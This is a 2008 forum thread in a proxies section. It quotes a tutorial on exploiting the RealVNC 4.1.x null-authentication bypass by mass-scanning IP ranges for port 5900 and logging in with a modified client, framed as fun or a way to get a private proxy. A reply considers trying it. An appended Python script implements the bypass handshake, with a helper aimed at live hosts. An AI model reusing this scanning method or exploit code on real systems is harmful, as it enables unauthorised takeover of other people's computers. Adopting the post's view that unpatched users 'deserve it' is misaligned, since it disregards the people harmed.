Discussion in 'Proxies' started by bigkee42, Oct 18, 2008.

    I found this while surfing. I do not know if it is on here somewhere, but here goes.

    "This technique/method is rather 'noobish' and will be frowned upon.

A while ago there was a problem with RealVNC 4.1.0 - 4.1.1 which allowed remote users to authenticate without the real password, aka: null authentication. The sad thing is that a lot of people haven't updated to newer software, and thus can be exploited. What the hell, they deserve it.

Basically the modified VNC client specifies null authentication to the server, and regardless of whether there's authentication, the server will accept it and authenticate using null.

This is generally easier in 'Windoze', because you need the required modified VNC client. I don't know if there's a modified version for Linux; you'll have to check that for yourself.

    Basically, You scan IP ranges for servers with port 5900 (VNC) open, and then you can check if they're exploitable using the modified VNC client.

    You can use nmap to do the scanning, but if you're not familiar with it, you're recommended to use this file;

    VNC vulnerability scanner:


    You run it via cmd or a shell.

    Use the syntax

    "vncbypassauth -i [IP-ADDRESS] -p [5900] [-cT or -vnc]"

    : -i specifies the IP address
    : -p specifies the port
    : -cT or -vnc is the scan type; -cT is connect() and may be required in Windows.

    You can specify a whole range by using;


    So the syntax put together might look like this;

    vncbypassauth -i -p 5900 -cT

    By default it should save a file with information about filtered, closed and open ports in your home directory/My Documents.

    When you check the newly created text file and you find an IP which has port 5900 open (they're running VNC), then open the modified VNC client;
    Which can be found here:
    (at the moment I'm not aware of a modified client for Linux; if you know of one, notify me and I'll edit the tutorial)

    Then just enter the IP and BOOM. It should authenticate you, and if it doesn't, the chances are the server has an up-to-date version of VNC.

    This can be fun for newbies, or maybe you need a private proxy or something."

    Interesting. As much as I want to try taking over machines running VNC, it's a serious problem if you get nailed. All you need to do is pick the wrong machine and you're screwed.
    Some big powerful companies run VNC, and if you hack them, you may end up getting prosecuted.
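The "null authentication" the quoted tutorial describes is a client that answers the RFB 3.8 security-type negotiation with type None (1) no matter what the server offered. The following is an added example, not the tutorial's vncbypassauth tool or its modified client: a minimal Python RFB client that does exactly that, plus a constructed server simulator (vulnerable and patched variants) so the exchange can be run offline. The simulator, the `probe_host` helper and its default port are assumptions; the only real-world claim is the handshake itself.

```python
import socket
import struct
import threading
from collections import namedtuple

# RFB 3.8 security types (RFC 6143 numbering).
SEC_INVALID = 0   # count byte of 0 means "connection refused", reason string follows
SEC_NONE = 1      # no authentication at all
SEC_VNCAUTH = 2   # DES challenge/response on the password

CLIENT_VERSION = b"RFB 003.008\n"
ProbeResult = namedtuple("ProbeResult", "offered bypassed")


class RfbHandshakeError(Exception):
    pass


def read_exact(sock, n):
    """RFB fields are fixed-width; read exactly n bytes or fail loudly."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise RfbHandshakeError("connection closed mid-handshake")
        buf += chunk
    return buf


def probe_null_auth(sock):
    """Handshake as an RFB 3.8 client, always choosing security type None.

    bypassed is True only when the server did NOT list None yet still sent
    SecurityResult OK (0): the RealVNC 4.1.x behaviour the tutorial relies on.
    A server that legitimately offers None is not a bypass, just unprotected.
    """
    banner = read_exact(sock, 12)                       # e.g. b"RFB 003.008\n"
    if not banner.startswith(b"RFB "):
        raise RfbHandshakeError("not an RFB server: %r" % banner)
    sock.sendall(CLIENT_VERSION)

    count = read_exact(sock, 1)[0]
    if count == SEC_INVALID:
        length = struct.unpack(">I", read_exact(sock, 4))[0]
        reason = read_exact(sock, length).decode("ascii", "replace")
        raise RfbHandshakeError("server refused connection: " + reason)
    offered = list(read_exact(sock, count))

    sock.sendall(bytes([SEC_NONE]))                     # the bypass: ignore the list
    result = struct.unpack(">I", read_exact(sock, 4))[0]  # SecurityResult, 0 = OK
    return ProbeResult(offered, result == 0 and SEC_NONE not in offered)


def probe_host(host, port=5900, timeout=5.0):
    """Probe a live server (assumed helper; only run against hosts you own)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return probe_null_auth(sock)


def fake_vnc_server(sock, patched):
    """Constructed simulator of a password-protected server offering only VNC auth.

    patched=False reproduces the bug and honours whatever type the client picks;
    patched=True rejects a type it did not offer. The real VNC-auth DES path is
    not simulated: any other choice simply gets SecurityResult failed.
    """
    offered = [SEC_VNCAUTH]
    try:
        sock.sendall(b"RFB 003.008\n")
        read_exact(sock, 12)                            # client's version string
        sock.sendall(bytes([len(offered)] + offered))
        chosen = read_exact(sock, 1)[0]
        if chosen == SEC_NONE and not patched:
            sock.sendall(struct.pack(">I", 0))          # OK: unauthenticated session
        else:
            reason = b"security type not offered"
            sock.sendall(struct.pack(">II", 1, len(reason)) + reason)
    finally:
        sock.close()


def run_probe(patched):
    """Drive probe_null_auth against the simulator over a local socketpair."""
    client, server = socket.socketpair()
    worker = threading.Thread(target=fake_vnc_server, args=(server, patched))
    worker.start()
    try:
        return probe_null_auth(client)
    finally:
        client.close()
        worker.join()


if __name__ == "__main__":
    print("vulnerable simulator:", run_probe(patched=False))   # bypassed=True
    print("patched simulator:   ", run_probe(patched=True))    # bypassed=False
```

The check is deliberately read-only at the protocol level: it stops right after SecurityResult and never sends ClientInit, so a vulnerable server is identified without a framebuffer session being opened. Note the `SEC_NONE not in offered` guard; without it a server configured with no password at all would be misreported as vulnerable.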